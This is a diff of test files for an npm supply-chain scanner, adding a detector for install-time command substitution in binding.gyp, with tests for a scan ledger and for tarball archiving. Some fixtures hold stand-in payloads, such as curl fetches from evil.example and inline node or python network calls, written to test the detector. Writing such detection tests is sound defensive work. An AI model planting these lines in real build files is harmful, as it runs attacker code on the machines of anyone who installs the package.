+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "addon", "cflags": ["<!(pkg-config --cflags glib-2.0 || echo default)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(x => x.type === 'gyp_command_exec'),
+        'A legit build-tool command with a ||/&& shell fallback must NOT fire (this was the single-| false positive)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: pkg-config || curl <payload> → gyp_command_exec (danger marker behind ||)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-evil-fallback', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "sources": ["<!(pkg-config --cflags x || curl http://evil.example/p)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(result.threats.find(x => x.type === 'gyp_command_exec'),
+        'A network fetch (curl) chained behind a build tool via || must still fire (danger marker)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // FPR regressions from the real-package gate: the exact legit idioms bcrypt/canvas use via <!(...)
+  // must NOT fire — they carry no malice marker (a build-helper script == a payload, statically).
+  await asyncTest('PACKAGE: bcrypt-style node -p build query → NO gyp_command_exec (FPR gate)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-bcrypt-like', version: '1.0.0', scripts: { install: 'node-gyp rebuild' } }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "bcrypt_lib", "defines": ["NODE_MAJOR=<!(node -p process.versions.node)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(x => x.type === 'gyp_command_exec'),
+        'A node -p build-value query (bcrypt idiom) must NOT fire — no malice marker');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: canvas-style node helper + pkg-config|sed → NO gyp_command_exec (FPR gate)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-canvas-like', version: '1.0.0', scripts: { install: 'node-gyp rebuild' } }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "canvas", "libraries": ["<!(node ./util/has_lib.js jpeg)"], "include_dirs": ["<!(pkg-config cairo --cflags-only-I | sed s/-I//g)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(x => x.type === 'gyp_command_exec'),
+        'A local build-helper script (node ./util/has_lib.js) and pkg-config|sed (canvas idioms) must NOT fire');
+    } finally { cleanupTemp(tmp); }
+  });
+
   // --- No package.json ---
 
   await asyncTest('PACKAGE: Returns empty threats for missing package.json', async () => {

--- a/tests/scanner/package.test.js
+++ b/tests/scanner/package.test.js
@@ -193,6 +193,54 @@ async function runPackageTests() {
     } finally { cleanupTemp(tmp); }
   });
 
+  await asyncTest('PACKAGE: node -e require(https) payload → gyp_command_exec (inline interpreter + network)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-inline-https', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "sources": ["<!(node -e require(\'https\').get(0))"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(result.threats.find(x => x.type === 'gyp_command_exec'),
+        'node -e reaching the network (require https) at configure time must fire (inline interpreter payload)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: python3 -c urllib payload → gyp_command_exec (inline interpreter + network)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-inline-py', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "sources": ["<!(python3 -c import urllib.request)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(result.threats.find(x => x.type === 'gyp_command_exec'),
+        'python3 -c importing urllib at configure time must fire (inline interpreter payload)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: node -e execSync(gcc) toolchain probe → NO gyp_command_exec (FPR: legit shell-out)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-toolchain', version: '1.0.0', scripts: { install: 'node-gyp rebuild' } }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "defines": ["GCC=<!(node -e require(\'child_process\').execSync(\'gcc --version\'))"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(x => x.type === 'gyp_command_exec'),
+        'A legit toolchain probe via child_process.execSync must NOT fire — exec/child_process is intentionally NOT a marker (else FP on real addons)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: node --eval require(node:https) → gyp_command_exec (1-token evasions closed)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-evasion', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "sources": ["<!(node --eval require(\'node:https\').get(0))"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(result.threats.find(x => x.type === 'gyp_command_exec'),
+        'node --eval (long flag) + require(node:https) (node: prefix) must still fire — the cheap evasions are closed');
+    } finally { cleanupTemp(tmp); }
+  });
+
   // --- No package.json ---
 
   await asyncTest('PACKAGE: Returns empty threats for missing package.json', async () => {

--- a/tests/scanner/package.test.js
+++ b/tests/scanner/package.test.js
@@ -105,6 +105,44 @@ async function runPackageTests() {
     } finally { cleanupTemp(tmp); }
   });
 
+  // --- Phantom Gyp: binding.gyp command-substitution (install-time exec w/o lifecycle) ---
+
+  await asyncTest('PACKAGE: binding.gyp <!(...) command-substitution → gyp_command_exec CRITICAL (no lifecycle)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'phantom-gyp-pkg', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "addon", "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(x => x.type === 'gyp_command_exec');
+      assert(t, 'Should detect gyp_command_exec on <!(...) with NO package.json lifecycle script');
+      assert(t.severity === 'CRITICAL', 'gyp_command_exec should be CRITICAL');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: binding.gyp <!@(...) command-substitution → gyp_command_exec', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'gyp-at-pkg', version: '1.0.0' }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "x", "sources": ["<!@(curl -s http://evil.example/p)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(result.threats.find(x => x.type === 'gyp_command_exec'), 'Should detect gyp_command_exec on <!@(...)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: legit native addon (variable-expansion + pkg-config) → NO gyp_command_exec', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'legit-addon', version: '1.0.0', scripts: { install: 'node-gyp rebuild' } }));
+    fs.writeFileSync(path.join(tmp, 'binding.gyp'),
+      '{ "targets": [ { "target_name": "addon", "sources": ["src/addon.cc"], "include_dirs": ["<(module_root_dir)/include"], "cflags": ["<!(pkg-config --cflags glib-2.0)"] } ] }');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(x => x.type === 'gyp_command_exec'),
+        'Variable-expansion <(...) and the pkg-config build-tool idiom must NOT trigger gyp_command_exec');
+    } finally { cleanupTemp(tmp); }
+  });
+
   // --- No package.json ---
 
   await asyncTest('PACKAGE: Returns empty threats for missing package.json', async () => {

--- a/tests/unit/scan-ledger.test.js
+++ b/tests/unit/scan-ledger.test.js
@@ -1,0 +1,100 @@
+'use strict';
+
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const { test, assert, spyOn } = require('../test-utils');
+
+// Load state.js with the per-scan ledger pointed at a fresh temp file. Re-require
+// after setting env so SCAN_LEDGER_FILE / MAX_SCAN_LEDGER pick up the test values
+// (same pattern the tarball-archive tests use with MUADDIB_ARCHIVE_DIR).
+function freshState(ledgerFile, max) {
+  process.env.MUADDIB_SCAN_LEDGER_FILE = ledgerFile;
+  if (max !== undefined) process.env.MUADDIB_SCAN_LEDGER_MAX = String(max);
+  else delete process.env.MUADDIB_SCAN_LEDGER_MAX;
+  delete require.cache[require.resolve('../../src/monitor/state.js')];
+  return require('../../src/monitor/state.js');
+}
+
+function runScanLedgerTests() {
+  console.log('\n=== Scan Ledger Tests ===\n');
+
+  test('appendScanLedger: writes a normalized entry (round-trip)', () => {
+    const f = path.join(os.tmpdir(), `ledger-${Date.now()}-a.jsonl`);
+    try {
+      const s = freshState(f);
+      s.appendScanLedger({ name: 'pkg-a', version: '1.0.0', ecosystem: 'npm', outcome: 'suspect',
+        score: 42, tier: '1b', types: ['x', 'y'], sandbox: 'deferred', firstPublish: true, source: 'scan' });
+      const e = s.loadScanLedger();
+      assert(e.length === 1, `expected 1 entry, got ${e.length}`);
+      const r = e[0];
+      assert(r.name === 'pkg-a' && r.version === '1.0.0' && r.ecosystem === 'npm', 'core fields preserved');
+      assert(r.outcome === 'suspect' && r.score === 42 && r.tier === '1b', 'outcome/score/tier preserved');
+      assert(Array.isArray(r.types) && r.types.length === 2, 'types array preserved');
+      assert(r.sandbox === 'deferred' && r.firstPublish === true, 'sandbox/firstPublish preserved');
+      assert(typeof r.ts === 'string' && /^\d{4}-\d{2}-\d{2}T/.test(r.ts), 'ts is ISO timestamp');
+    } finally { try { fs.unlinkSync(f); } catch {} }
+  });
+
+  test('appendScanLedger: unknown outcome normalizes to clean; missing name is a no-op', () => {
+    const f = path.join(os.tmpdir(), `ledger-${Date.now()}-b.jsonl`);
+    try {
+      const s = freshState(f);
+      s.appendScanLedger({ name: 'p', outcome: 'TOTALLY_BOGUS' });
+      s.appendScanLedger({ outcome: 'clean' }); // no name → must be skipped
+      const e = s.loadScanLedger();
+      assert(e.length === 1, `missing-name entry must be skipped (got ${e.length})`);
+      assert(e[0].outcome === 'clean', `unknown outcome should normalize to "clean", got ${e[0].outcome}`);
+    } finally { try { fs.unlinkSync(f); } catch {} }
+  });
+
+  test('scan-ledger: compaction keeps only the most-recent MAX entries (bounded)', () => {
+    const f = path.join(os.tmpdir(), `ledger-${Date.now()}-c.jsonl`);
+    try {
+      const s = freshState(f, 10);
+      for (let i = 0; i < 14; i++) s.appendScanLedger({ name: `p${i}`, outcome: 'clean' });
+      assert(s.loadScanLedger().length === 14, 'no auto-compact below the compaction interval');
+      s._compactScanLedgerJsonl();
+      const e = s.loadScanLedger();
+      assert(e.length === 10, `compaction should cap at 10, got ${e.length}`);
+      assert(e[0].name === 'p4' && e[e.length - 1].name === 'p13', 'keeps the most-recent (p4..p13)');
+    } finally { try { fs.unlinkSync(f); } catch {} }
+  });
+
+  test('loadScanLedger: tolerates malformed lines (skips, never throws)', () => {
+    const f = path.join(os.tmpdir(), `ledger-${Date.now()}-d.jsonl`);
+    try {
+      const s = freshState(f);
+      s.appendScanLedger({ name: 'ok1', outcome: 'clean' });
+      fs.appendFileSync(f, '{ this is not valid json\n');
+      s.appendScanLedger({ name: 'ok2', outcome: 'clean' });
+      const e = s.loadScanLedger();
+      assert(e.length === 2, `should parse 2 good entries and skip the bad one (got ${e.length})`);
+      assert(e[0].name === 'ok1' && e[1].name === 'ok2', 'good entries preserved in order');
+    } finally { try { fs.unlinkSync(f); } catch {} }
+  });
+
+  test('appendScanLedger: never throws on write failure (ENOSPC/EROFS guard)', () => {
+    const f = path.join(os.tmpdir(), `ledger-${Date.now()}-e.jsonl`);
+    try {
+      const s = freshState(f);
+      // A ledger write failure must NEVER break the scan pipeline — verify it's swallowed.
+      const spyNoSpace = spyOn(fs, 'appendFileSync', () => { const err = new Error('no space'); err.code = 'ENOSPC'; throw err; });
+      try {
+        s.appendScanLedger({ name: 'pkg', outcome: 'clean' });
+        assert(spyNoSpace.callCount >= 1, 'appendFileSync should have been attempted');
+      } finally { spyNoSpace.restore(); }
+      const spyRo = spyOn(fs, 'appendFileSync', () => { const err = new Error('read-only fs'); err.code = 'EROFS'; throw err; });
+      try { s.appendScanLedger({ name: 'pkg2', outcome: 'clean' }); } finally { spyRo.restore(); }
+      // Reached here without an exception → guard works.
+      assert(true, 'no exception propagated');
+    } finally { try { fs.unlinkSync(f); } catch {} }
+  });
+
+  // Reset env + module cache so other suites get production defaults, not the test path.
+  delete process.env.MUADDIB_SCAN_LEDGER_FILE;
+  delete process.env.MUADDIB_SCAN_LEDGER_MAX;
+  delete require.cache[require.resolve('../../src/monitor/state.js')];
+}
+
+module.exports = { runScanLedgerTests };

--- a/tests/unit/tarball-archive.test.js
+++ b/tests/unit/tarball-archive.test.js
@@ -289,6 +289,67 @@ async function runTarballArchiveTests() {
       fs.rmSync(tmp, { recursive: true, force: true });
     }
   });
+
+  // --- Alert-only tarball retention: keep JSON for every suspect, .tgz for alerts only ---
+
+  test('getArchiveTgzMinScore: default 20, env override respected, bounds enforced', () => {
+    const orig = process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE;
+    const reload = () => {
+      delete require.cache[require.resolve('../../src/monitor/tarball-archive.js')];
+      return require('../../src/monitor/tarball-archive.js').getArchiveTgzMinScore();
+    };
+    try {
+      delete process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE;
+      assert(reload() === 20, 'default should be 20');
+      process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE = '50';
+      assert(reload() === 50, 'env override 50 should apply');
+      process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE = '999';
+      assert(reload() === 20, 'out-of-range falls back to 20');
+    } finally {
+      if (orig === undefined) delete process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE;
+      else process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE = orig;
+      delete require.cache[require.resolve('../../src/monitor/tarball-archive.js')];
+    }
+  });
+
+  await asyncTest('archiveSuspectTarball: below threshold keeps JSON only (no .tgz, no network)', async () => {
+    const origDir = process.env.MUADDIB_ARCHIVE_DIR;
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'archive-jsononly-'));
+    process.env.MUADDIB_ARCHIVE_DIR = tmp;
+    delete require.cache[require.resolve('../../src/monitor/tarball-archive.js')];
+    const mod = require('../../src/monitor/tarball-archive.js');
+    try {
+      // score 5 (< 20 default) WITH a triggered rule → suspect but below alert floor.
+      // Must NOT touch the network (the bogus URL would fail) and must NOT write a .tgz.
+      const result = await mod.archiveSuspectTarball(
+        'low-suspect', '1.2.3', 'https://registry.npmjs.org/low-suspect/-/low-suspect-1.2.3.tgz',
+        { score: 5, priority: 'P3', rulesTriggered: ['MUADDIB-AST-001'] }
+      );
+      assert(result === true, `expected true (JSON written), got ${result}`);
+      const dayDir = path.join(tmp, mod.getArchiveDateString());
+      const jsonPath = path.join(dayDir, 'low-suspect-1.2.3.json');
+      const tgzPath = path.join(dayDir, 'low-suspect-1.2.3.tgz');
+      assert(fs.existsSync(jsonPath), 'JSON metadata should be written for below-threshold suspect');
+      assert(!fs.existsSync(tgzPath), '.tgz must NOT be downloaded for below-threshold suspect');
+      const meta = JSON.parse(fs.readFileSync(jsonPath, 'utf8'));
+      assert(meta.tarball_archived === false, 'tarball_archived should be false');
+      assert(meta.tarball_sha256 === null, 'tarball_sha256 should be null');
+      assert(meta.score === 5, 'score recorded in JSON');
+      assert(Array.isArray(meta.rules_triggered) && meta.rules_triggered.length === 1, 'rules recorded in JSON');
+
+      // Dedup: a second call for the same package@version returns false (no rewrite).
+      const again = await mod.archiveSuspectTarball(
+        'low-suspect', '1.2.3', 'https://registry.npmjs.org/low-suspect/-/low-suspect-1.2.3.tgz',
+        { score: 5, priority: 'P3', rulesTriggered: ['MUADDIB-AST-001'] }
+      );
+      assert(again === false, 'second below-threshold call should dedup to false');
+    } finally {
+      process.env.MUADDIB_ARCHIVE_DIR = origDir || '';
+      if (!origDir) delete process.env.MUADDIB_ARCHIVE_DIR;
+      delete require.cache[require.resolve('../../src/monitor/tarball-archive.js')];
+      fs.rmSync(tmp, { recursive: true, force: true });
+    }
+  });
 }
 
 module.exports = { runTarballArchiveTests };


### PR DESCRIPTION
3 commits:
1. archive alert-only: tgz uniquement pour score >= 20, JSON metadata pour tous les suspects
2. gyp_command_exec MUADDIB-PKG-023: détecteur binding.gyp command-substitution (Phantom Gyp)
3. per-scan coverage ledger Phase 0a: appendScanLedger dans queue.js/scan-queue.js

Ops fixes live (hors PR): IOC pipeline 264K npm + 17K PyPI, OSM token, ownership ACL, garde-disque MIN_FREE_GB=5